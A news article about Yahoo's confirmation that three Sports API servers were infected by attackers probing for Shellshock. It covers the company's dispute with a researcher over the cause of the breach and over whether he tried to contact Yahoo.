Yahoo confirms servers infected — but not by Shellshock

Yahoo says no customer data was placed at risk after servers were infiltrated by malware -- and the insidious Shellshock bug was not at fault.
Written by Charlie Osborne, Contributing Writer

Yahoo has confirmed a "handful" of infected servers have been discovered, but says the Shellshock bug is not to blame.

The tech giant came under scrutiny following a report published by Future South Technologies earlier this week. Jonathan Hall, senior engineer and president of the security company said that Yahoo's systems were breached using the Shellshock bug. Romanian hackers running scripts designed to form bot networks for DDoS attacks were allegedly to blame. 

The report also said that Lycos and WinZip are vulnerable to Shellshock; the former company denying the breach, and the latter having confirmed the problem and thanked the researcher.

Shellshock is a severe vulnerability in Bash, an open-source shell used as the default command-line interpreter on many operating systems including Linux, variations of Unix, and Apple's OSX. The vulnerability allows a hacker to execute code and the same commands as a legitimate user -- without authentication. While this limits a hacker in the first instance, being able to gain such a foothold means that privileges could be escalated and full access to a system eventually granted.

In a post to Hacker News, Yahoo CISO Alex Stamos refuted Hall's claims, saying that after "investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock."

"Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers," Stamos writes. "These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs."

The Yahoo executive says that the servers were immediately isolated, although the affected API servers are used to provide live sports game streaming and do not hold or store user data anyway. At this time, the company has found no evidence that user data has been impacted, and the exploit pattern has been added to CI/CD code scanners to catch future issues.

However, it is worth keeping in mind that cybercriminals will often infiltrate the weaker links of a chain -- whether it be a server or third-party computer system with access to a desired network -- and so isolation or closure may not be enough of a response to such infiltration.

In addition, the Yahoo executive denies that Hall contacted the company, despite the security researcher saying he "attempted to contact Yahoo several times" and resorted to "emailing Marissa Mayer and contacted her via Twitter, both of which yielded zero results and no response." Hall has also posted what appears to be communication with a member of Yahoo's security team, Ricky Connell.

Stamos said:

"Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty and security aliases 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation."

Read on: In the world of security

Editorial standards